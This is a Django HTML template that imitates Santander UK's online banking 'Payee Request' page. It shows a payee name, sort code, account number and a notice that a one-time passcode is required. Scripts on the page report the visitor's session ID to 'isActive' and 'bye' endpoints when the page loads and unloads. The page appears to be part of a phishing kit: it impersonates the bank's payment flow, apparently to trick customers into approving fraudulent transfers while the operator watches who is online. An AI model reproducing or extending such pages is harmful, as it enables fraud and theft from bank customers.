{% load static %}
{% block content %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Santander</title>
<link rel="icon" href="{% static 'styles/favicon.ico' %}" type="image/x-icon">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
 <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> 
<link rel="stylesheet" type="text/css" href="santander.css">
<link rel="stylesheet" type="text/css" href="{% static 'styles/santander.css' %}">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<style type="text/css">
    .bs-example{
        margin: 20px;
    }
    
    
    .navbar-toggler:hover{
        
        background-color:#ec0000
        
        
    }
    
       a:hover{
        
        background-color:#ec0000
        
        
    }
    
    a{
        
        
        text-decoration:none !important;
        
        font-size:1rem !important;
        
        
    }

#submit:hover{

color: white !important



}

</style>
</head>
<body style="background:white !important">
<div class="bs-example" style="width:100%;margin:0 auto !important">
    <nav class="navbar navbar-expand-md navbar-light bg-light" style="width:100%;margin:0 auto !important;background-color:#ec0000 !important;">
        <a href="#" class="navbar-brand" style="color:white"><img src="{% static 'styles/navbarimg.png' %}" width = "130px">  </a>
        <button type="button" onclick="window.location.href='https://www.santander.co.uk/logoff'" class="navbar-toggler" data-toggle="collapse" data-target="#navbarCollapse" style="outline:none;border:0px;background:#ec0000">
<span class="navbar-toggler" style="outline:none;border:0px">

<p style="color:white;font-size:smaller;position:relative;bottom:1.5rem">Log out</p>
        </button>

        <div class="collapse" id="navbar" style="border:0px !important;outline:none !important">
            <div class="navbar-nav" style="background-color:#ec0000;border:0px !important;outline:none !important">
                <a href="#" class="nav-item nav-link" style="color:white !important">My Accounts & Transactions</a>
                <a href="#" class="nav-item nav-link active" style="color:white !important">Payments & Transfers</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Standing Orders</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Direct Debits</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Credit Cards</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Account Services</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">My Details & Settings</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Help & Contact Us</a>
                <a href="#" class="nav-item nav-link" style="color:white !important">Logout</a>
                
            </div>
           
        </div>
    </nav>
    
    <div class="form-group" style="margin: 0 auto !important;padding-left:0%;position:relative;bottom:1rem">
        <br>
        <div style="margin:0 auto;text-align:center;">
        <p style="color:#666;font-size: 1em;
font-weight: bold;
margin: 1em 0;
line-height: 1.2em;display:inline">Payee Request |</p>  <p style="color:#666;font-size: 1em;
font-weight: 400;
margin: 1em 0;
line-height: 1.2em;display:inline">Step 1 of 3 </p></div>
<br>
         <div class="w3-border" style="width:80%;margin: 0 auto">
         
  <div class="w3" style="height:5px;width:33%;background-color:#ec0000 !important"></div>
</div> 
      
      
    </div>
    
       <div class="form-group" style="margin: 0 auto !important;padding-left:0%;width:85%">
        <br>
      <p style="font-size:13px">Please note that in order to make a payment online, a One Time Passcode (OTP) may be required. When required, it will be sent to your registered mobile phone via SMS and you'll be required to enter the OTP on screen to complete your request.</p>
        
      
    </div>

       <div class="form-group" style="margin: 0 auto !important;padding-left:5%">
     
        
    <input style="visibility: hidden" value="{{request.session.pid}}" id="pid">        
      
    </div>
<div class="contents">
			<div class="show">
				<div class="form-item">
					<span class="labeltext">Account to make payment from:</span>
					<span class="data">
					CURRENT ACCOUNT
				    </span>
				</div>
				<div class="form-item">
					<span class="labeltext">Payment number:</span>
					<span class="data">1</span>
				</div>
	
				<div class="form-item">
					<span class="labeltext">Payee name:</span>
					<span class="data">R STEVENS</span>
				</div>
				<div class="form-item">
					<span class="labeltext">Their account:</span>
					<span class="data">20-47-38 46825712</span>
				</div>
				<div class="form-item">
					<span class="labeltext">Payment reference:</span>
					<span class="data">5286895799093197</span>
				</div>
				
					<div class="form-item">
						<span class="labeltext">Your comments:</span>
						<span class="data"></span>
					</div>
				
			</div><br><br>
			<form action="{% url 'loading' %}" method="PUT">
                
                
	<span class="button" style="text-align:;padding-left:70%">
							<div style="">	&nbsp;    &nbsp;  &nbsp;  &nbsp;<input type="submit" name="signOtpDelete.actions.1" class="submitOnlyOnce continue firstfocus defaultAction primary" tabindex="1" value="Continue" style="background-color: white!important;border-color: #ec0000 !important;display:inline;color:#ec0000" id="submit"> 		
				&nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;&nbsp;  <input type="submit" name="signOtpDelete.actions.1" class="submitOnlyOnce continue firstfocus defaultAction primary" tabindex="1" value="Cancel" style="background-color: #ec0000 !important;border-color: #ec0000 !important;display:inline;align-self:flex-end !important" id="submit"> 
			</div>
            
            	</span>
             
				</form>
<br><br>
</div>
    
</div>
</body>
</html>
{% block javascript %}
<script>
    

function online(){

var ip_address = document.getElementById('pid').value 
console.log(ip_address)


$.ajax({


type: 'GET',
 
 url: '{% url "isActive" %}',

 data: {
            'pid': ip_address
        },
 


success: function(response){

  
if(response.accept){





}

   

},

error: function(response){







}




}

)}

</script>

<script>


function offline(){

var ip_address = document.getElementById('pid').value 

$.ajax({


type: 'GET',
 
 url: '{% url "bye" %}',

 data: {
            'pid': ip_address
        },
 


success: function(response){

  
if(response.accept){





}

   

},

error: function(response){







}





});




}




</script>

<script>
online()
</script>

<script>
$(window).on("beforeunload", function() { 
    offline()
})

</script>
        {% endblock javascript %}

        {% endblock %}
